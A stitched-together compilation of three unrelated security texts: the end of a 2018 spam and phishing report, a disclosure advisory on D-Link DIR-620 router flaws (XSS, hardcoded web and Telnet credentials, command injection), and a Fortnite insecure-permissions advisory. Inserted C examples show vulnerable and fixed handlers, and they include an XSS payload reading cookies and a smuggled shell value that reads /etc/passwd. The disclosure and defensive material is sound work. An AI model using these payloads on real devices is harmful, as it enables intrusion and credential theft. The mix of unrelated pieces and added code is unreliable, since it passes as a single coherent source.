However, the combined financial category—banks (18.25%), online stores (17.26%), payment systems (8.41%)—still accounted for almost half of all attacks (43.92%), which is up 4.46 p.p. against the previous quarter. The next categories in descending order were Government Organizations (4.75%), Social Networks and Blogs (4.11%), Telecommunications Companies (2.47%), IT Companies (1.55%), Messengers (0.66%), Online Games (0.43%), and Airlines (0.07%).

Conclusion

The quarter’s main topic, one that we will likely return to many times this year, is personal data. It remains one of the most sought-after wares in the world of information technology for app and service developers, owners of various agencies, and, of course, cybercriminals. Unfortunately, many users still fail to grasp the need to protect their personal information and pay no attention to whom their data is transferred, or how, when they use social media.

Cybercriminal interest in personal data is confirmed by our analysis of spam traffic, where one of the main topics remains mail phishing employing a range of social and technical engineering methods. Throughout the quarter, we observed fake notifications on behalf of social media and popular services, bank phishing, and “Nigerian prince” emails.

The GDPR, set to come into force in late May, is intended to correct the situation regarding personal data, at least in the EU. Time will tell how effective it is. But one thing is clear: even before its introduction, the new regulation is being actively exploited as a topic by cybercriminals and many others. Regrettably, the GDPR is unlikely to fix the situation.

In Q1 2018, the average share of spam in global email traffic was 51.82%, down 4.63 p.p. against Q4 2017; the Anti-Phishing module blocked 90,245,060 attempts to direct users to fraudulent pages; and Brazil (19.07%, -1.72 p.p.) had the largest share of users attacked by phishers.

Based on the quarter’s results, it is safe to predict that scammers will continue to exploit “fashionable” topics, two of which are cryptocurrencies and new ICOs. Given that these topics have begun to attract interest from the general public, a successful attack can reap vast rewards.

Backdoors in D-Link’s backyard

“If you want to change the world, start with yourself.” In the case of security research this can be rephrased to: “If you want to make the world safer, start with the smart things in your home.” Or, to be more specific, start with your router – the core of any home network as well as an interesting research object. And that router you got from your ISP as part of your internet contract is even more interesting when it comes to research.

The impact of vulnerabilities

Note: the following information about vulnerabilities has been submitted to the respective stakeholders (D-Link, the ISP, MITRE), and we are publishing it in accordance with our vulnerability disclosure policy.

The following advisory describes four vulnerabilities and hardcoded accounts in D-Link DIR-620 firmware. The firmware runs on various D-Link routers that one of the biggest ISPs in Russia delivers to its customers (this conclusion is based on the fact that the router is provided as part of the standard customer contract and the hardcoded credentials contain the name of the ISP in the login string). This is probably why this particular model of router is so popular in Russia and CIS countries (most home routers are located behind their ISP’s NAT, which is why these routers don’t appear in the statistics).

Geography of vulnerable routers

The object of research

The latest versions of the firmware have hardcoded default credentials that can be exploited by an unauthenticated attacker to gain privileged access to the firmware and to extract sensitive data, e.g., configuration files with plain-text passwords. The vulnerable web interface allows an unauthenticated attacker to run arbitrary JavaScript code in the user environment and run arbitrary commands in the router’s operating system (OS).

Example of firmware interface (probably customized for ISP purposes)

These issues were originally identified in firmware version 1.0.37. Some of the discovered vulnerabilities were also identified in other versions of the firmware:

  • 1.3.1
  • 1.3.3
  • 1.4.0
  • 2.0.22

Technical details

Weakness in user data validation (reflected cross-site scripting) (CVE-2018-6212)

The one input field that allows user input – Quick search – inspired me to look deeper into the firmware: the field provides an XSS attack vector. A reflected cross-site scripting (XSS) attack is possible because special characters entered in this field are not filtered and the XMLHttpRequest object is processed incorrectly (this vulnerability was discovered in v.1.3.3, but is also present in other versions).

Demonstration of a reflected XSS
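The missing step behind a reflected XSS like this one is output encoding: whatever the server reflects from the query string must be HTML-encoded before it is placed into the page. The block below is an added example, not D-Link's code; the handler name, the `<div>` fragment and the search term are assumptions used to illustrate the bug class and its hardened form.

```c
/* Added example, not code from the DIR-620 firmware: a reflected parameter
 * handler with and without output encoding. The "Results for:" fragment and
 * the payload are constructed for the illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Encode the five characters that change meaning in HTML. Returns the number
 * of bytes written (excluding the NUL), or -1 if out is too small. Worst case
 * growth is 6 bytes per input byte ("&quot;", "&#x27;"). */
int html_escape(const char *in, char *out, size_t outsz)
{
    size_t used = 0;
    if (outsz == 0) return -1;
    for (const unsigned char *p = (const unsigned char *)in; *p; p++) {
        char one[2] = { (char)*p, '\0' };
        const char *rep;
        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > outsz) return -1;   /* keep room for the NUL */
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

/* Vulnerable pattern: the search term is pasted straight into the markup,
 * so a term containing <script> becomes live script in the victim's browser.
 * Returns a malloc'd string the caller must free. */
char *reflect_unsafe(const char *term)
{
    const char *fmt = "<div class=\"result\">Results for: %s</div>";
    size_t n = strlen(fmt) + strlen(term) + 1;
    char *html = malloc(n);
    if (html) snprintf(html, n, fmt, term);
    return html;
}

/* Hardened form: encode first, then format. The same markup is produced,
 * but the term can only ever render as text. */
char *reflect_safe(const char *term)
{
    size_t esz = strlen(term) * 6 + 1;
    char *esc = malloc(esz);
    if (!esc || html_escape(term, esc, esz) < 0) { free(esc); return NULL; }
    char *html = reflect_unsafe(esc);   /* input is already inert here */
    free(esc);
    return html;
}

int main(void)
{
    /* constructed test input, not a payload from the advisory */
    const char *payload = "<script>alert(document.cookie)</script>";
    char *bad = reflect_unsafe(payload), *good = reflect_safe(payload);
    printf("unsafe: %s\nsafe:   %s\n", bad, good);
    free(bad);
    free(good);
    return 0;
}
```

Encoding at the point of output is the fix; filtering on input (as the advisory notes is missing here) is a weaker second layer because the same value may be reflected into several contexts.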

Vulnerability metrics:

CVSS v3 Base Score: 6.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)

Hardcoded default credentials for web dashboard (CVE-2018-6213)

I downloaded the firmware and extracted the filesystem. Most Unix-based firmware includes BusyBox – software that provides several stripped-down Unix tools for embedded systems. This makes it easy to identify the proprietary binaries, i.e., all binaries that are not part of the original BusyBox toolset and were probably added or modified for ISP purposes.

I extracted strings from the web server binary (httpd), and my attention was immediately drawn to the “anonymous” string. I looked at the function where this string was being used.

The code responsible for checking the user’s credentials contains hardcoded credentials

These privileged credentials cannot be changed by the administrator. Privileged access to the dashboard allows an attacker to extract sensitive data.
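The triage step described above (run `strings` over httpd and look for literals that do not belong in a login routine) is simple enough to reproduce. The block below is an added example, not the advisory's code: a minimal `strings` equivalent that reports printable runs from a byte buffer, applied to a constructed blob that stands in for a slice of a stripped binary's .rodata. The blob's contents are invented for the illustration and are not data from the DIR-620 firmware.

```c
/* Added example, not from the advisory: a minimal `strings`-style extractor
 * of the kind used to find the "anonymous" literal in httpd. The sample blob
 * is constructed for this example. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

#define MAX_STR 64

/* Walk blob[0..len) and copy every run of printable ASCII (0x20..0x7e) of at
 * least min_len bytes into out[]. Returns the number of strings found; runs
 * longer than MAX_STR-1 are truncated. */
size_t extract_strings(const unsigned char *blob, size_t len, size_t min_len,
                       char out[][MAX_STR], size_t max_out)
{
    size_t found = 0, run = 0;
    char cur[MAX_STR];
    for (size_t i = 0; i <= len; i++) {           /* i == len flushes the last run */
        int printable = i < len && blob[i] >= 0x20 && blob[i] <= 0x7e;
        if (printable) {
            if (run < MAX_STR - 1) cur[run] = (char)blob[i];
            run++;
        } else {
            if (run >= min_len && found < max_out) {
                size_t n = run < MAX_STR - 1 ? run : MAX_STR - 1;
                memcpy(out[found], cur, n);
                out[found][n] = '\0';
                found++;
            }
            run = 0;
        }
    }
    return found;
}

/* Index of the first extracted string containing needle, or -1. */
int find_string(char strs[][MAX_STR], size_t n, const char *needle)
{
    for (size_t i = 0; i < n; i++)
        if (strstr(strs[i], needle)) return (int)i;
    return -1;
}

/* Constructed stand-in for a slice of a stripped binary: literals separated
 * by non-printable bytes, as they sit in .rodata. Not real firmware data. */
static const unsigned char sample_blob[] = {
    0x7f, 'E', 'L', 'F', 0x01, 0x01, 0x00, 0x00,
    'a','n','o','n','y','m','o','u','s', 0x00, 0x00,
    'a','d','m','i','n', 0x00,
    '/','t','m','p','/','c','o','n','f','i','g','.','x','m','l', 0x00,
    0x01, 0x02, 'o','k', 0x00,
    '%','s',' ','%','s', 0x00,
};

int main(void)
{
    char strs[16][MAX_STR];
    size_t n = extract_strings(sample_blob, sizeof sample_blob, 4, strs, 16);
    for (size_t i = 0; i < n; i++)
        printf("%zu: %s%s\n", i, strs[i],
               strstr(strs[i], "anonymous") ? "   <-- candidate account name" : "");
    return 0;
}
```

On a real image, run the same idea over every non-BusyBox binary under /bin, /sbin and /usr/sbin, and pay attention to short literals adjacent to format strings or path names: an account name that appears next to a password-comparison routine but nowhere in the configuration files is exactly the pattern that led to CVE-2018-6213.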

Vulnerability metrics:

CVSS v3 Base Score: 6.5

Vector: (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

OS command injection (CVE-2018-6211)

An OS command injection is possible as a result of incorrect processing of user input in the following parameter (the vulnerability was discovered in v.1.0.3):

/index.cgi?<…>&res_buf

Example of request with OS command injection
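The advisory elides the exact query string, so the block below does not reproduce the DIR-620 request. It is an added example of the bug class: a CGI handler that pastes a parameter value into a shell command line, beside the hardened form, which validates the value against the narrow shape it should have and then executes the program directly with no shell in between. The parameter name `res_buf`, the `ifconfig` command and the interface-name rule are hypothetical choices for the illustration.

```c
/* Added example, not D-Link's code: OS command injection and its fix.
 * "res_buf" and "ifconfig" are hypothetical stand-ins for the illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern: the parameter value is formatted into a command line
 * that a handler would hand to system(). A value such as
 * "eth0; cat /etc/passwd" makes the shell run a second command. Returns 0,
 * or -1 if the command did not fit. */
int build_cmd_unsafe(const char *res_buf, char *cmd, size_t cmdsz)
{
    int n = snprintf(cmd, cmdsz, "ifconfig %s", res_buf);
    return (n < 0 || (size_t)n >= cmdsz) ? -1 : 0;
}

/* Hardened step 1: allowlist. An interface name is 1..15 characters from
 * [A-Za-z0-9.-]; anything else (';', '|', '`', '$', spaces) is rejected. */
int is_valid_ifname(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 15) return 0;
    for (size_t i = 0; i < n; i++) {
        char c = s[i];
        if (!((c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
              (c >= '0' && c <= '9') || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened step 2: even a validated value is passed as one argv element to
 * the program itself; no shell ever parses it. Returns the child's exit
 * status, or -1 if the value was rejected or the child could not be run. */
int run_safe(const char *prog, const char *res_buf)
{
    if (!is_valid_ifname(res_buf)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)prog, (char *)res_buf, NULL };
        execvp(prog, argv);
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    /* constructed attacker value, not the advisory's payload */
    const char *evil = "eth0; cat /etc/passwd";
    char cmd[128];
    if (build_cmd_unsafe(evil, cmd, sizeof cmd) == 0)
        printf("unsafe handler would run: %s\n", cmd);
    printf("safe handler, injected value: %d (rejected)\n", run_safe("echo", evil));
    printf("safe handler, clean value: exit %d\n", run_safe("echo", "eth0"));
    return 0;
}
```

Both steps matter: the allowlist alone still leaves a shell in the path if the program is later changed, and `execvp` alone does not stop a value that the called program itself interprets. The fix for the Telnet side of this advisory is the same principle applied to the configuration that the injected commands were used to read.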

Vulnerability metrics:

CVSS v3 Base Score: 9.1

Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)

Hardcoded default credentials for Telnet (CVE-2018-6210)

Using the vulnerability above, an attacker can extract the Telnet credentials. The credentials were discovered in firmware v1.0.3. By using the default credentials for Telnet, an attacker can obtain administrative access to the router (see the fragment of /etc/passwd below).

Demonstration of OS command injection vulnerability

Vulnerability metrics:

CVSS v3 Base Score: 10.0

Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

How to fix it

We received an official response from the vendor stating that this router model is no longer supported. Given that no patch is available, we provide the following recommendations:

  • Restrict any access to the web dashboard using a whitelist of trusted IPs
  • Restrict any access to Telnet
  • Regularly change your router admin username and password

Advisory Status

01/15/2018 – reported to vendor
01/15/2018 – reported to ISP
01/24/2018 – received a response from ISP
02/06/2018 – received a response from vendor. Official statement: the router model is no longer supported by the vendor, so the vendor will only patch vulnerabilities if the ISP sends a request to do so.


Epic Games Fortnite 4.2-CL-4072250 Insecure File Permissions


Vendor: Epic Games, Inc.
Product web page: https://www.epicgames.com
Affected version: 4.2-CL-4072250
4.1-CL-4053532
4.0-CL-4039451

Summary: Fortnite is a co-op sandbox survival game developed by Epic
Games and People Can Fly and published by Epic Games. The game was
released as a paid-for early access title for Microsoft Windows, macOS,
PlayStation 4 and Xbox One on July 25, 2017, with a full free-to-play
release expected in 2018. The retail versions of the game were published
by Gearbox Publishing, while online distribution of the PC versions is
handled by Epic’s launcher.

Desc: Fortnite suffers from an elevation of privileges vulnerability that
can be exploited by any authenticated user, who can replace the game's
executable file with a binary of choice. The vulnerability exists due to
improper permissions: the ‘C’ flag (Change) is granted to the ‘Authenticated
Users’ group on the Binaries directory and its contents.

Tested on: Microsoft Windows 10 Home

Vulnerability discovered by Gjoko ‘LiquidWorm’ Krstic
@zeroscience

Advisory ID: ZSL-2018-5469
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5469.php

10.04.2018

E:\Program Files\Epic Games\Fortnite\FortniteGame>dir /b Binaries\Win64\*.exe
FortniteClient-Win64-Shipping.exe
FortniteClient-Win64-Shipping_BE.exe
FortniteClient-Win64-Shipping_EAC.exe
FortniteLauncher.exe

E:\Program Files\Epic Games\Fortnite\FortniteGame>cacls Binaries
E:\Program Files\Epic Games\Fortnite\FortniteGame\Binaries BUILTIN\Administrators:F
BUILTIN\Administrators:(OI)(CI)(IO)F
NT AUTHORITY\SYSTEM:F
NT AUTHORITY\SYSTEM:(OI)(CI)(IO)F
NT AUTHORITY\Authenticated Users:C
NT AUTHORITY\Authenticated Users:(OI)(CI)(IO)C
BUILTIN\Users:R
BUILTIN\Users:(OI)(CI)(IO)(special access:)
GENERIC_READ
GENERIC_EXECUTE